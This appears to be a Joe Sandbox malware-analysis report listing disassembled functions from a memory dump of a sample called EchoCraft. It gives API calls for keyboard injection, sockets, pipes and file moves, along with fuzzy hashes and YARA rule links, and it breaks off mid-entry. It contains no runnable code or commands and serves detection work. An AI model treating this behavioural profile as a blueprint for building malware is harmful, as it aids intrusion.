Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c5cf86178323d8536c9b2b0fc8a2e64f3382dcb51b3dfaa51c45bcc3f2aa9400
Instruction ID: bef390ebcf3db9f2d4ca1573f7f70b78dd7854c9a5869173a117640099bcad4c
Opcode Fuzzy Hash: c5cf86178323d8536c9b2b0fc8a2e64f3382dcb51b3dfaa51c45bcc3f2aa9400
Instruction Fuzzy Hash: 8451D0A0A287D13EFB364735CC49BBB7EA95B46304F088589E0D5468D2C7E8ACC4D7B0

Function 00AEB4FE Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00AEB53D
GetKeyboardState.USER32(?), ref: 00AEB552
SetKeyboardState.USER32(?), ref: 00AEB5B3
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AEB5DF
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AEB5FC
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AEB63B
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AEB65C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f8b214bdf815b985b84c34921eab3fac46cc0b45ce45350d66b680bc957c30fa
Instruction ID: 1d7ff1293357ee67011b024c68c9219e0e53575c10b605987e1ac997cbebd2f2
Opcode Fuzzy Hash: f8b214bdf815b985b84c34921eab3fac46cc0b45ce45350d66b680bc957c30fa
Instruction Fuzzy Hash: B251E6A09247D67EFB328736CC59BBBBEA95B06300F088499E1D5564C2D7A4EC84D770

Function 00AB584E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00AB5FC3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00AB5890
__fassign.LIBCMT ref: 00AB590B
__fassign.LIBCMT ref: 00AB5926
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00AB594C
WriteFile.KERNEL32(?,FF8BC35D,00000000,00AB5FC3,00000000,?,?,?,?,?,?,?,?,?,00AB5FC3,?), ref: 00AB596B
WriteFile.KERNEL32(?,?,00000001,00AB5FC3,00000000,?,?,?,?,?,?,?,?,?,00AB5FC3,?), ref: 00AB59A4

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a65112987afefc27d646a19cd0d8cde7ca0c3fedc606172ab1ad376524119eea
Instruction ID: 234e69b7450a86ab1cbc14f7f4abdbd278542a52222c8aa92775f0af4c39d427
Opcode Fuzzy Hash: a65112987afefc27d646a19cd0d8cde7ca0c3fedc606172ab1ad376524119eea
Instruction Fuzzy Hash: 8D51BF71E00649EFDB20CFA9D885BEEBBF8EF09310F14455AE955E7292D7309A41CB60

Function 00AA3140 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00AA316B
___except_validate_context_record.LIBVCRUNTIME ref: 00AA3173
_ValidateLocalCookies.LIBCMT ref: 00AA3201
__IsNonwritableInCurrentImage.LIBCMT ref: 00AA322C
_ValidateLocalCookies.LIBCMT ref: 00AA3281

Strings

csm, xrefs: 00AA3216

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0ad2eb1efebd48b179d03ed72f8df63ea870bebfbcb966540f547edcc90c2fe5
Instruction ID: 7c6af0d46c5954eb83948ad7d3c6589d7c5a1dfc34da10997127e862bd2c124f
Opcode Fuzzy Hash: 0ad2eb1efebd48b179d03ed72f8df63ea870bebfbcb966540f547edcc90c2fe5
Instruction Fuzzy Hash: 4E418236A002089BCF10DF68C845AAEBBB5AF56324F148555F9156B3E2D731DF19CB90

Function 00B018FE Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B03821: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B0384D
Part of subcall function 00B03821: _wcslen.LIBCMT ref: 00B0386E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B01958
WSAGetLastError.WSOCK32 ref: 00B01967
WSAGetLastError.WSOCK32 ref: 00B01A0F
closesocket.WSOCK32(00000000), ref: 00B01A3F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: d0dfe4918961b169d27fdfe543b3f78f98158828cc0bc9d6220c85b3a4ddb59d
Instruction ID: cd0a2c9b170ac36b0347b0fda9e6ecd68f95d17b1e547ad65babd2e037b6a1a3
Opcode Fuzzy Hash: d0dfe4918961b169d27fdfe543b3f78f98158828cc0bc9d6220c85b3a4ddb59d
Instruction Fuzzy Hash: 7541C531600214AFDB149F68C885BAABBE9FF45364F148099F85A9B2D1CB74ED41CBE1

Function 00AED656 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEE5A9: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AED678,?), ref: 00AEE5C6

Part of subcall function 00AEE5A9: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AED678,?), ref: 00AEE5DF

lstrcmpiW.KERNEL32(?,?), ref: 00AED69B
MoveFileW.KERNEL32(?,?), ref: 00AED6D5
_wcslen.LIBCMT ref: 00AED75B
_wcslen.LIBCMT ref: 00AED771
SHFileOperationW.SHELL32(?), ref: 00AED7B7

Strings

\*.*, xrefs: 00AED749

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: b1910d8fbdcf5fa97abbfa9579369529c642ad74df856fcc444092f0b7626c0f
Instruction ID: a0c305fa647cad82877907e0b9b02382e5533f30558c3c696ef30bb8dcef4511
Opcode Fuzzy Hash: b1910d8fbdcf5fa97abbfa9579369529c642ad74df856fcc444092f0b7626c0f
Instruction Fuzzy Hash: A7414771D452589EDF12EBA5DA91ADE77B8AF08340F1004E6E509EB181EB34AB88CB50

Function 00B134D7 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B134F6
GetWindowLongW.USER32(?,000000F0), ref: 00B13529
GetWindowLongW.USER32(?,000000F0), ref: 00B1355E
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B13590
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B135BA
GetWindowLongW.USER32(?,000000F0), ref: 00B135CB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B135E5

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: e95a9a143a417d7c2316947ff1ffa0af344d1e6f68d18d94ee4ea9728f8e7b37
Instruction ID: 58a1d5eb800b7c73869ff307b87e246255179f5ddb1f76d65403100c9bffc2ae
Opcode Fuzzy Hash: e95a9a143a417d7c2316947ff1ffa0af344d1e6f68d18d94ee4ea9728f8e7b37
Instruction Fuzzy Hash: 5C3117706052509FDB21DF18DC84FA537E6FB6AB21F9401A4F5058B2B2DB71EE80DB41

Function 00AE8019 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AE805E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AE8084
SysAllocString.OLEAUT32(00000000), ref: 00AE8087
SysAllocString.OLEAUT32 ref: 00AE80A8
SysFreeString.OLEAUT32 ref: 00AE80B1
StringFromGUID2.OLE32(?,?,00000028), ref: 00AE80CB
SysAllocString.OLEAUT32(?), ref: 00AE80D9

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 6adaf3407bca2ba12b55421477ed0dbf4a5683647c620c131c2a77b064ccb7e5
Instruction ID: 3a546e6482d2bfc9866d0ea657f5ec88cd25f2b14a25372ee219a17988b5d336
Opcode Fuzzy Hash: 6adaf3407bca2ba12b55421477ed0dbf4a5683647c620c131c2a77b064ccb7e5
Instruction Fuzzy Hash: 58215675605214BFDB10AFA9DC88DAA77ECEB09360740C125F909CB2A1DE74EC85C765

Function 00AF0D2C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00AF0D4C
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AF0D88

Strings

nul, xrefs: 00AF0DC1

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: d69ccdffe44283bbf9ce57f03ca003c95b218607f3c29773fcca61125ed72f27
Instruction ID: ba17a83caff42be941ab8103f772efebab32fd901c18e6ed32e4945b3b556294
Opcode Fuzzy Hash: d69ccdffe44283bbf9ce57f03ca003c95b218607f3c29773fcca61125ed72f27
Instruction Fuzzy Hash: B4215C7454030AEFDB208FA8DC44EAA7BB4AF44725F208A19FAA1D72D1DB70A940CB50

Function 00AF0E01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00AF0E20
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AF0E5B

Strings

nul, xrefs: 00AF0E93

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: b2c643f83ceff82ded3af748c5cd19f2f1a55e93fe5bf05cb9185daa86d6e31d
Instruction ID: 65d022eeb7f9b8c6855d57dd05b6f08a6fc809b590a9e45b608288129147b17b
Opcode Fuzzy Hash: b2c643f83ceff82ded3af748c5cd19f2f1a55e93fe5bf05cb9185daa86d6e31d
Instruction Fuzzy Hash: 62213D756013199FDB208FA8DC44EAA77A8AF55724F208E19FEE1E32D1DB719841CB50

Function 00B14789 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A86DB1: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A86DEF
Part of subcall function 00A86DB1: GetStockObject.GDI32(00000011), ref: 00A86E03
Part of subcall function 00A86DB1: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A86E0D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B147EE
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B147FB
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B14806
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B14815
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B14821

Strings

Msctls_Progress32, xrefs: 00B147BF

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: b52dec1e9ed058f1e932187a0b2f3a8e1b321031df59085362b3ce04db59ba1f
Instruction ID: 16259d0c42678ee50b0b5514e51d91b55c9c9a26a9d52d3fe06c755ed896d86e
Opcode Fuzzy Hash: b52dec1e9ed058f1e932187a0b2f3a8e1b321031df59085362b3ce04db59ba1f
Instruction Fuzzy Hash: 8E1186B155021D7EEF119F64CC85EE77F9DEF08798F014111BA04A6190CB75DC61DBA0

Function 00ABDBFF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ABDBC3: _free.LIBCMT ref: 00ABDBEC

_free.LIBCMT ref: 00ABDC4D

Part of subcall function 00AB2DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ABDBF1,?,00000000,?,00000000,?,00ABDC18,?,00000007,?,?,00ABE016,?), ref: 00AB2DFE
Part of subcall function 00AB2DE8: GetLastError.KERNEL32(?,?,00ABDBF1,?,00000000,?,00000000,?,00ABDC18,?,00000007,?,?,00ABE016,?,?), ref: 00AB2E10

_free.LIBCMT ref: 00ABDC58
_free.LIBCMT ref: 00ABDC63
_free.LIBCMT ref: 00ABDCB7
_free.LIBCMT ref: 00ABDCC2
_free.LIBCMT ref: 00ABDCCD
_free.LIBCMT ref: 00ABDCD8

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: adfa214f2c7667408dfcde6e879eeaacbd2d62c54a1f5b624c496d63c5eec31d
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: C411FE72644B04AAEA21BBB0CE47FCB77DCAF05700F854C16B299A6263EA75B5058750

Function 00AEE1D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AEE1EA
LoadStringW.USER32(00000000), ref: 00AEE1F1
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AEE207
LoadStringW.USER32(00000000), ref: 00AEE20E
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AEE252

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00AEE22F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 28f18397d375f0c8c1fbacf61257ea18b43bb45db023355aa0337f92f1e39c8e
Instruction ID: 04b55513417672f77f2b44e11a9f44d3d5eb2fc816a060c69bb1fec865195887
Opcode Fuzzy Hash: 28f18397d375f0c8c1fbacf61257ea18b43bb45db023355aa0337f92f1e39c8e
Instruction Fuzzy Hash: 470112F69002487FE711AB949D89EE7776CDB08700F414591B746E6045EA749E844B71

Function 00AF11AF Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00AF11BF
EnterCriticalSection.KERNEL32(00000000,?), ref: 00AF11D1
TerminateThread.KERNEL32(00000000,000001F6), ref: 00AF11DF
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00AF11ED
CloseHandle.KERNEL32(00000000), ref: 00AF11FC
InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF120C
LeaveCriticalSection.KERNEL32(00000000), ref: 00AF1213

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: aeaedd537a915a3d842ca2d83ecc283aeb55bbda9eb0093d12165ba03e27c177
Instruction ID: 862c0687c3f0797697f6dd3ab3952581b177e0618d80ebe1fdafb02600ed6ca9
Opcode Fuzzy Hash: aeaedd537a915a3d842ca2d83ecc283aeb55bbda9eb0093d12165ba03e27c177
Instruction Fuzzy Hash: AAF03732550612FBD3465FA4ED88BDABB39FF04702F805221F612A38A0CBB4A570CB90

Function 00B024A6 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B02606
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B02627
WSAGetLastError.WSOCK32 ref: 00B02638
htons.WSOCK32(?,?,?,?,?), ref: 00B02721
inet_ntoa.WSOCK32(?), ref: 00B026D2

Part of subcall function 00AE41FC: _strlen.LIBCMT ref: 00AE4206

Part of subcall function 00B039F7: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00AFF452), ref: 00B03A13

_strlen.LIBCMT ref: 00B0277B

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 85befb6e67a1d55b473d4773b2a3e226cd298d2e77121d435768d7041daf1813
Instruction ID: 72809e210917d3f5e8c3afc3efd6010206f2af49a643d86222335c34978d399f
Opcode Fuzzy Hash: 85befb6e67a1d55b473d4773b2a3e226cd298d2e77121d435768d7041daf1813
Instruction Fuzzy Hash: 22B1DF35604300AFC724EF24C899E6A7BE5EF85318F54858CF45A5B2E2DB31ED4ACB91

Function 00A86AAD Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00A86AD3
GetWindowRect.USER32(?,?), ref: 00A86B14
ScreenToClient.USER32(?,?), ref: 00A86B3C
GetClientRect.USER32(?,?), ref: 00A86C7A
GetWindowRect.USER32(?,?), ref: 00A86C9B

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: e38d5f7b54d4e5142601445a0012791e730e94e162d51f5d380a9232eff50fe9
Instruction ID: a1ca89eecaa284cdf469eac278374ff314f182e42dd52602bdb5184f4a7d2830
Opcode Fuzzy Hash: e38d5f7b54d4e5142601445a0012791e730e94e162d51f5d380a9232eff50fe9
Instruction Fuzzy Hash: E6B18A74A0064ADBDB14DFB9C484BEEBBF1FF58310F14851AE8A9D7240DB34A991DB50

Function 00AB0547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00AB044A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB0466
__allrem.LIBCMT ref: 00AB047D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB049B
__allrem.LIBCMT ref: 00AB04B2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB04D0

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
